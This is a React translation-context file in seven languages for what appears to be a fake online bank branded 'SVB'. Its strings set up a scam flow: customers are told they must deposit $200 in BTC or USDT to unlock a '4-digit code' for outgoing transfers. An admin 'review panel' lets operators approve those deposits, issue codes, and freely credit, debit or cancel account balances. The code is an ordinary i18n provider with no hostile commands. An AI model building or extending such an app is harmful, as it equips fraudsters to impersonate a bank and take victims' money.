import React, { createContext, useContext, useState, useEffect } from 'react';
import { Language } from '../types';

interface LanguageContextType {
  language: Language;
  setLanguage: (lang: Language) => void;
  t: (key: string) => string;
}

const translations: Record<Language, Record<string, string>> = {
  en: {
    'nav.home': 'Home',
    'nav.dashboard': 'Dashboard',
    'nav.cards': 'Virtual Cards',
    'nav.bills': 'Bill Pay',
    'nav.deposit': 'Deposit',
    'nav.withdraw': 'Withdraw',
    'nav.send': 'Send Funds',
    'nav.receive': 'Receive',
    'nav.history': 'History',
    'nav.admin': 'SVB Review Panel',
    'nav.support': 'Support Chat',
    'nav.logout': 'Sign Out',
    'nav.login': 'Sign In',
    'nav.lang': 'Language',
    'dash.welcome': 'Welcome back',
    'dash.total_balance': 'Total Account Balance',
    'dash.code_required': '4-Digit Code Required for Outgoing Transfers',
    'dash.code_status': 'Security Code Status',
    'dash.code_approved': '4-Digit Code Approved & Active',
    'dash.code_pending': 'Deposit Verification Pending',
    'dash.code_not_requested': '$200 Deposit Required to Access 4-Digit Code',
    'dash.deposit_btn': 'Deposit $200 (BTC / USDT)',
    'dash.your_code': 'Your Outgoing Transfer Code:',
    'card.title': 'SVB Primary Virtual Bank Card',
    'card.quick_freeze': 'Freeze Card',
    'card.quick_unfreeze': 'Unfreeze Card',
    'card.copy': 'Copy Number',
    'admin.search_placeholder': 'Search by user email or 10-digit account number...',
    'admin.deposit_title': 'SVB Review Balance Deposit',
    'admin.withdraw_title': 'SVB Review Account Withdrawal',
    'admin.cancel_title': 'Cancel Transfer / Transaction',
    'admin.pending_activation': 'Pending $200 Activation Deposits (BTC / USDT)',
    'admin.approve': 'Approve Deposit & Generate 4-Digit Code',
    'admin.reject': 'Reject Deposit',
    'transfer.enter_code': 'Enter your 4-digit security code to authorize transfer',
  },
  es: {
    'nav.home': 'Inicio',
    'nav.dashboard': 'Panel Principal',
    'nav.cards': 'Tarjetas Virtuales',
    'nav.bills': 'Pago de Servicios',
    'nav.deposit': 'Depositar',
    'nav.withdraw': 'Retirar',
    'nav.send': 'Enviar Fondos',
    'nav.receive': 'Recibir',
    'nav.history': 'Historial',
    'nav.admin': 'Panel SVB Review',
    'nav.support': 'Soporte al Cliente',
    'nav.logout': 'Cerrar Sesión',
    'nav.login': 'Iniciar Sesión',
    'nav.lang': 'Idioma',
    'dash.welcome': 'Bienvenido de nuevo',
    'dash.total_balance': 'Saldo Total de la Cuenta',
    'dash.code_required': 'Se requiere código de 4 dígitos para transferencias salientes',
    'dash.code_status': 'Estado del Código de Seguridad',
    'dash.code_approved': 'Código de 4 dígitos aprobado y activo',
    'dash.code_pending': 'Verificación de depósito pendiente',
    'dash.code_not_requested': 'Se requiere depósito de $200 para acceder al código de 4 dígitos',
    'dash.deposit_btn': 'Depositar $200 (BTC / USDT)',
    'dash.your_code': 'Su código de transferencia saliente:',
    'card.title': 'Tarjeta de Banco Virtual SVB',
    'card.quick_freeze': 'Congelar Tarjeta',
    'card.quick_unfreeze': 'Descongelar Tarjeta',
    'card.copy': 'Copiar Número',
    'admin.search_placeholder': 'Buscar por correo de usuario o número de cuenta de 10 dígitos...',
    'admin.deposit_title': 'Depósito de Saldo SVB Review',
    'admin.withdraw_title': 'Retiro de Cuenta SVB Review',
    'admin.cancel_title': 'Cancelar Transferencia / Transacción',
    'admin.pending_activation': 'Depósitos de Activación de $200 Pendientes (BTC / USDT)',
    'admin.approve': 'Aprobar Depósito y Generar Código de 4 Dígitos',
    'admin.reject': 'Rechazar Depósito',
    'transfer.enter_code': 'Ingrese su código de seguridad de 4 dígitos para autorizar',
  },
  fr: {
    'nav.home': 'Accueil',
    'nav.dashboard': 'Tableau de bord',
    'nav.cards': 'Cartes Virtuelles',
    'nav.bills': 'Paiement de Factures',
    'nav.deposit': 'Déposer',
    'nav.withdraw': 'Retirer',
    'nav.send': 'Envoyer des Fonds',
    'nav.receive': 'Recevoir',
    'nav.history': 'Historique',
    'nav.admin': 'Panneau SVB Review',
    'nav.support': 'Support Client',
    'nav.logout': 'Déconnexion',
    'nav.login': 'Connexion',
    'nav.lang': 'Langue',
    'dash.welcome': 'Bienvenue à nouveau',
    'dash.total_balance': 'Solde Total du Compte',
    'dash.code_required': 'Code à 4 chiffres requis pour les transferts sortants',
    'dash.code_status': 'Statut du Code de Sécurité',
    'dash.code_approved': 'Code à 4 chiffres approuvé et actif',
    'dash.code_pending': 'Vérification du dépôt en attente',
    'dash.code_not_requested': 'Dépôt de 200 $ requis pour le code à 4 chiffres',
    'dash.deposit_btn': 'Déposer 200 $ (BTC / USDT)',
    'dash.your_code': 'Votre code de transfert sortant:',
    'card.title': 'Carte Bancaire Virtuelle SVB',
    'card.quick_freeze': 'Geler la Carte',
    'card.quick_unfreeze': 'Dégeler la Carte',
    'card.copy': 'Copier le Numéro',
    'admin.search_placeholder': 'Rechercher par email ou numéro de compte à 10 chiffres...',
    'admin.deposit_title': 'Dépôt de Solde SVB Review',
    'admin.withdraw_title': 'Retrait de Compte SVB Review',
    'admin.cancel_title': 'Annuler le Transfert / Transaction',
    'admin.pending_activation': 'Dépôts d\'Activation de 200 $ en Attente (BTC / USDT)',
    'admin.approve': 'Approuver le Dépôt & Générer le Code à 4 Chiffres',
    'admin.reject': 'Rejeter le Dépôt',
    'transfer.enter_code': 'Entrez votre code de sécurité à 4 chiffres pour autoriser',
  },
  de: {
    'nav.home': 'Startseite',
    'nav.dashboard': 'Dashboard',
    'nav.cards': 'Virtuelle Karten',
    'nav.bills': 'Rechnungszahlung',
    'nav.deposit': 'Einzahlen',
    'nav.withdraw': 'Abheben',
    'nav.send': 'Geld Senden',
    'nav.receive': 'Empfangen',
    'nav.history': 'Verlauf',
    'nav.admin': 'SVB Review-Bereich',
    'nav.support': 'Kundensupport',
    'nav.logout': 'Abmelden',
    'nav.login': 'Anmelden',
    'nav.lang': 'Sprache',
    'dash.welcome': 'Willkommen zurück',
    'dash.total_balance': 'Gesamtkontostand',
    'dash.code_required': '4-stelliger Code für ausgehende Überweisungen erforderlich',
    'dash.code_status': 'Sicherheitscode-Status',
    'dash.code_approved': '4-stelliger Code genehmigt & aktiv',
    'dash.code_pending': 'Einzahlungsüberprüfung ausstehend',
    'dash.code_not_requested': '200 $ Einzahlung für 4-stelligen Code erforderlich',
    'dash.deposit_btn': '200 $ einzahlen (BTC / USDT)',
    'dash.your_code': 'Ihr Überweisungscode:',
    'card.title': 'Virtuelle SVB-Bankkarte',
    'card.quick_freeze': 'Karte Sperren',
    'card.quick_unfreeze': 'Karte Entsperren',
    'card.copy': 'Nummer Kopieren',
    'admin.search_placeholder': 'Suche nach E-Mail oder 10-stelliger Kontonummer...',
    'admin.deposit_title': 'SVB Review-Guthabeneinzahlung',
    'admin.withdraw_title': 'SVB Review-Kontoabhebung',
    'admin.cancel_title': 'Überweisung / Transaktion Stornieren',
    'admin.pending_activation': 'Ausstehende 200 $ Aktivierungseinzahlungen (BTC / USDT)',
    'admin.approve': 'Einzahlung Genehmigen & 4-stelligen Code Generieren',
    'admin.reject': 'Einzahlung Ablehnen',
    'transfer.enter_code': 'Geben Sie Ihren 4-stelligen Sicherheitscode ein',
  },
  zh: {
    'nav.home': '首页',
    'nav.dashboard': '仪表板',
    'nav.cards': '虚拟银行卡',
    'nav.bills': '账单支付',
    'nav.deposit': '存款',
    'nav.withdraw': '提现',
    'nav.send': '发送资金',
    'nav.receive': '收款',
    'nav.history': '交易历史',
    'nav.admin': 'SVB Review 面板',
    'nav.support': '客户支持',
    'nav.logout': '退出登录',
    'nav.login': '登录',
    'nav.lang': '语言',
    'dash.welcome': '欢迎回来',
    'dash.total_balance': '账户总余额',
    'dash.code_required': '转出资金需要 4 位验证码',
    'dash.code_status': '安全验证码状态',
    'dash.code_approved': '4 位验证码已核准并激活',
    'dash.code_pending': '存款审核中',
    'dash.code_not_requested': '需存入 $200 激活 4 位验证码',
    'dash.deposit_btn': '存入 $200 (BTC / USDT)',
    'dash.your_code': '您的转账验证码：',
    'card.title': 'SVB 虚拟银行卡',
    'card.quick_freeze': '冻结银行卡',
    'card.quick_unfreeze': '解冻银行卡',
    'card.copy': '复制卡号',
    'admin.search_placeholder': '按用户邮箱或 10 位账号搜索...',
    'admin.deposit_title': 'SVB Review 资金充值',
    'admin.withdraw_title': 'SVB Review 账户扣款',
    'admin.cancel_title': '取消转账 / 交易',
    'admin.pending_activation': '待审核 $200 激活存款 (BTC / USDT)',
    'admin.approve': '批准存款并生成 4 位验证码',
    'admin.reject': '拒绝存款',
    'transfer.enter_code': '请输入您的 4 位安全验证码授权转账',
  },
  ar: {
    'nav.home': 'الرئيسية',
    'nav.dashboard': 'لوحة التحكم',
    'nav.cards': 'البطاقات الافتراضية',
    'nav.bills': 'دفع الفواتير',
    'nav.deposit': 'إيداع',
    'nav.withdraw': 'سحب',
    'nav.send': 'إرسال أموال',
    'nav.receive': 'استلام',
    'nav.history': 'السجل',
    'nav.admin': 'لوحة SVB Review',
    'nav.support': 'الدعم الفني',
    'nav.logout': 'تسجيل الخروج',
    'nav.login': 'تسجيل الدخول',
    'nav.lang': 'اللغة',
    'dash.welcome': 'مرحباً بعودتك',
    'dash.total_balance': 'إجمالي رصيد الحساب',
    'dash.code_required': 'رمز من 4 أرقام مطلوب للتحويلات الصادرة',
    'dash.code_status': 'حالة رمز الأمان',
    'dash.code_approved': 'تمت الموافقة على الرمز وتنشيطه',
    'dash.code_pending': 'جاري التحقق من الإيداع',
    'dash.code_not_requested': 'يلزم إيداع 200 دولار للحصول على الرمز',
    'dash.deposit_btn': 'إيداع 200 دولار (BTC / USDT)',
    'dash.your_code': 'رمز التحويل الخاص بك:',
    'card.title': 'بطاقة بنك SVB الافتراضية',
    'card.quick_freeze': 'تجميد البطاقة',
    'card.quick_unfreeze': 'إلغاء تجميد البطاقة',
    'card.copy': 'نسخ الرقم',
    'admin.search_placeholder': 'البحث بالبريد الإلكتروني أو رقم الحساب المكون من 10 أرقام...',
    'admin.deposit_title': 'إيداع رصيد SVB Review',
    'admin.withdraw_title': 'سحب حساب SVB Review',
    'admin.cancel_title': 'إلغاء التحويل / المعاملة',
    'admin.pending_activation': 'إيداعات التنشيط المعلقة بقيمة 200 دولار (BTC / USDT)',
    'admin.approve': 'الموافقة على الإيداع وإنشاء رمز من 4 أرقام',
    'admin.reject': 'رفض الإيداع',
    'transfer.enter_code': 'أدخل رمز الأمان المكون من 4 أرقام للموافقة',
  },
  ja: {
    'nav.home': 'ホーム',
    'nav.dashboard': 'ダッシュボード',
    'nav.cards': 'バーチャルカード',
    'nav.bills': '公共料金支払い',
    'nav.deposit': '入金',
    'nav.withdraw': '出金',
    'nav.send': '送金',
    'nav.receive': '受取',
    'nav.history': '取引履歴',
    'nav.admin': 'SVB Review パネル',
    'nav.support': 'カスタマーサポート',
    'nav.logout': 'ログアウト',
    'nav.login': 'ログイン',
    'nav.lang': '言語',
    'dash.welcome': 'おかえりなさい',
    'dash.total_balance': '総口座残高',
    'dash.code_required': '送金には4桁の暗証番号が必要です',
    'dash.code_status': 'セキュリティコードステータス',
    'dash.code_approved': '4桁の暗証番号が承認され有効です',
    'dash.code_pending': '入金確認中',
    'dash.code_not_requested': '4桁の暗証番号取得には$200の入金が必要です',
    'dash.deposit_btn': '$200を入金 (BTC / USDT)',
    'dash.your_code': 'あなたの送金用暗証番号：',
    'card.title': 'SVB バーチャル銀行カード',
    'card.quick_freeze': 'カード一時停止',
    'card.quick_unfreeze': 'カード解除',
    'card.copy': '番号をコピー',
    'admin.search_placeholder': 'メールアドレスまたは10桁の口座番号で検索...',
    'admin.deposit_title': 'SVB Review による資金入金',
    'admin.withdraw_title': 'SVB Review による口座出金',
    'admin.cancel_title': '送金・取引のキャンセル',
    'admin.pending_activation': '承認待ちの$200アクティベーション入金 (BTC / USDT)',
    'admin.approve': '入金を承認して4桁の暗証番号を発行',
    'admin.reject': '入金を却下',
    'transfer.enter_code': '送金を承認するには4桁の暗証番号を入力してください',
  }
};

const LanguageContext = createContext<LanguageContextType>({
  language: 'en',
  setLanguage: () => {},
  t: (key: string) => key,
});

export const LanguageProvider: React.FC<{ children: React.ReactNode }> = ({ children }) => {
  const [language, setLanguageState] = useState<Language>(() => {
    return (localStorage.getItem('svb_app_lang') as Language) || 'en';
  });

  const setLanguage = (lang: Language) => {
    setLanguageState(lang);
    localStorage.setItem('svb_app_lang', lang);
  };

  const t = (key: string): string => {
    return translations[language]?.[key] || translations['en']?.[key] || key;
  };

  return (
    <LanguageContext.Provider value={{ language, setLanguage, t }}>
      {children}
    </LanguageContext.Provider>
  );
};

export const useLanguage = () => useContext(LanguageContext);
